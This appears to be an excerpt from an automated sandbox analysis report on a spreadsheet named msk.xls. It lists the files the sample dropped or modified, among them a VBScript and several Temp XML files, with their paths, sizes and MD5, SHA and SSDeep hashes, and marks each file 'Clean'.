File Size 3.79 KB
MD5 ff5655c9631d10e3b07d06110e4c1bb3 Copy to Clipboard
SHA1 7f06460d1a09eddadacd056e1a5302ac18adfdbc Copy to Clipboard
SHA256 2252c2901ef42d0aecf41e8a79022f679b624f3f484c20ed81fd7dff188e8062 Copy to Clipboard
SSDeep 96:wwiafWG9WrWt0BWyY/WIWQWPWHWfWMT/ooxiyWIW8WFWgWgWDWaW/WD+SJW7DmWE:xfHeG0B+pjy2EfT/oeiyRHEjzON+s+Sh Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\Z11.xml Dropped File Text
Clean
MIME Type text/xml
File Size 1.74 KB
MD5 08f716f4e1d7ea06f61bad6e3e9fd298 Copy to Clipboard
SHA1 5397ba795334b1691721ef92bad74338b0098c9b Copy to Clipboard
SHA256 0b3ea5dcf88f100c6e0ce2ebb2c850d6de042bf2fca9ed83c47b713530acd977 Copy to Clipboard
SSDeep 24:2dH4+SHRZgO/RMFGlYeGlMhEMjnGpwjVLUYODOLG9RJh7h8Fsgg7fTnv29ty:cbcSO/RQGluydbzxIYODOLedqSg8bv2C Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\ZZ11.tmp Dropped File Text
Clean
MIME Type text/xml
File Size 1.72 KB
MD5 fef4bae0171534f633a2c9cd28e51a4a Copy to Clipboard
SHA1 e2042edd574295c9eca2155df5788152125be561 Copy to Clipboard
SHA256 75813ed2c7a29277e051794d633d6e9cb3501b648add1d7a20b0d6d530143ff6 Copy to Clipboard
SSDeep 24:2dH4+SHRZgOgMFplYeGlMhEMjnGpwjVLUYODOLG9RJh7h8FsVg7fTnv29tn:cbcSOgQpluydbzxIYODOLedqSV8bv23 Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\a.xml Dropped File Text
Clean
MIME Type text/xml
File Size 1.28 KB
MD5 39d764f8d4f2543224cfc0558e685cfe Copy to Clipboard
SHA1 d4fd2d5b549da693b407c5ae46ec21acc10b37c1 Copy to Clipboard
SHA256 c962ef38436b26bd8bd55146a90ac34bf323997fbb3686595ed35ddb4a65ac80 Copy to Clipboard
SSDeep 24:2dX4+SYiH2dMWt3tc6PZS/YeGdMhEMT5pw1ypRnh7hOUbMI4Mc:cr82X3en/uqdTQ16dTQ5 Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\writebin.vbs Dropped File Text
Clean
MIME Type text/plain
File Size 750 Bytes
MD5 45336aabea2c91a142117fd8d90f7b6c Copy to Clipboard
SHA1 f6053fa65a07a9d1aae80a25159c36055eae0364 Copy to Clipboard
SHA256 97cd69ab34502eeeb1c77414ac8cdd21c0d99e7cd7aeb30e3695b095bb33db38 Copy to Clipboard
SSDeep 12:6RBwyHSeRIrqF6lqd+FPC+Cz/V2dvcLk//DEcsdKUZcTZEX/OfOb0w6cxm0:6RBwyyO+qFwY6Ppe2d0Lk/AcsdYTqXn3 Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\MMM.TMP Dropped File Text
Clean
MIME Type text/plain
File Size 6 Bytes
MD5 312af82573a3365cf3c510d6b1552c90 Copy to Clipboard
SHA1 c49ba7a4cae847b7b6f8162bafcfbbc7b5de4840 Copy to Clipboard
SHA256 bd57b1dad8c2692be84de0fd2bd8795b0f7331e6b3a075a0d73f5c05710a75af Copy to Clipboard
SSDeep 3:QoHn:QoH Copy to Clipboard
ImpHash -
C:\Users\KEECFM~1\AppData\Local\Temp\~dr9078 Dropped File Empty
Clean
MIME Type application/x-empty
File Size 0 Bytes (not extracted)
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
e5b106d13edb2cb1711191948ba614e747fc03e236fd4c9628208231e525d1a9 Downloaded File Image
Clean
MIME Type image/png
File Size 218.61 KB
MD5 7093863e2d798e852edd5cdc7ab2fa7d Copy to Clipboard
SHA1 2f80a37ffaff75c98ce8de8c90ddae581419d716 Copy to Clipboard
SHA256 e5b106d13edb2cb1711191948ba614e747fc03e236fd4c9628208231e525d1a9 Copy to Clipboard
SSDeep 3072:MCvtVds2wtYdDaAhIp7qkZCKkmDGzjXtjOPs:trDaXZCPrjZn Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\microsoft\windows\history\history.ie5\index.dat Modified File Stream
Clean
MIME Type application/octet-stream
File Size 64.00 KB
MD5 75443b696e5054036c2c2c04e6f3f6f1 Copy to Clipboard
SHA1 0101bee2b234dc30264c5dcb8d5deedeb4c9bfbe Copy to Clipboard
SHA256 5db0fb6bbc0635956653a2177aa6125ee142e657a1294cc7efd0b935c1395b3a Copy to Clipboard
SSDeep 192:nNkjAgyfVkmB49cpcyr8qJOYYjshooa7+8/TLS8+yFVQUSPrtQjeC3bDX8fACL:NkjAgyfVkmBmmxQFOA Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat Modified File Stream
Clean
MIME Type application/octet-stream
File Size 64.00 KB
MD5 41c405d88f47a93c867992e72d342250 Copy to Clipboard
SHA1 30673f4dfb514912592f12160dfca3533e76adc1 Copy to Clipboard
SHA256 07e2f7c011eab3663c90fbab1e3a39eaf2915684374ed79f8e89a48c2e9414ea Copy to Clipboard
SSDeep 384:0MqFgV6CurSmH0aKLPuJxRKMJIiplH1EQDJ5R8WXGZtvNH:0MqSV6CurSmHyLPuJxRRlFJ5R1XytVH Copy to Clipboard
ImpHash -
c:\users\keecfmwgj\appdata\roaming\microsoft\windows\cookies\index.dat Modified File Stream
Clean
MIME Type application/octet-stream
File Size 32.00 KB
MD5 ba0beedb26c9a1dcbb30b1a63098b3e5 Copy to Clipboard
SHA1 a7e1994e6b7002394bcaaab228b98ca5d7ffd4c6 Copy to Clipboard
SHA256 0c5cceba5c416d5424387794429f89a2456b5326e2c7e5d8d2bd67f34bb616ec Copy to Clipboard
SSDeep 48:qGV+sobrV+sQ232Qbr2s29a2ptTQbrTAV+sobrV+sQ:qFsobosUQbKxFXQbnfsobos Copy to Clipboard
ImpHash -
image1.jpeg Extracted File Image
Clean
Parent File C:\Users\kEecfMwgj\Desktop\msk.xls
MIME Type image/jpeg
File Size 22.35 KB
MD5 948e28260308fe098cdfb42c046a0118 Copy to Clipboard
SHA1 4cfad060e65141e121ba8cb2f7fa4e0f40075825 Copy to Clipboard
SHA256 fa09ef1b83f77ac31aaaf81d02c0143e96066ecac209c4066ef6276f61ea7bc0 Copy to Clipboard
SSDeep 384:a149yjOIqaIwXSEBgli5LVwR6dZ9vvZh5KJ9WU8DUexcNkMEzOnWhMaDa54MTUVU:Y4EjOL/Agl8hznBv9KJ1+Uexc29OMW5x Copy to Clipboard
ImpHash -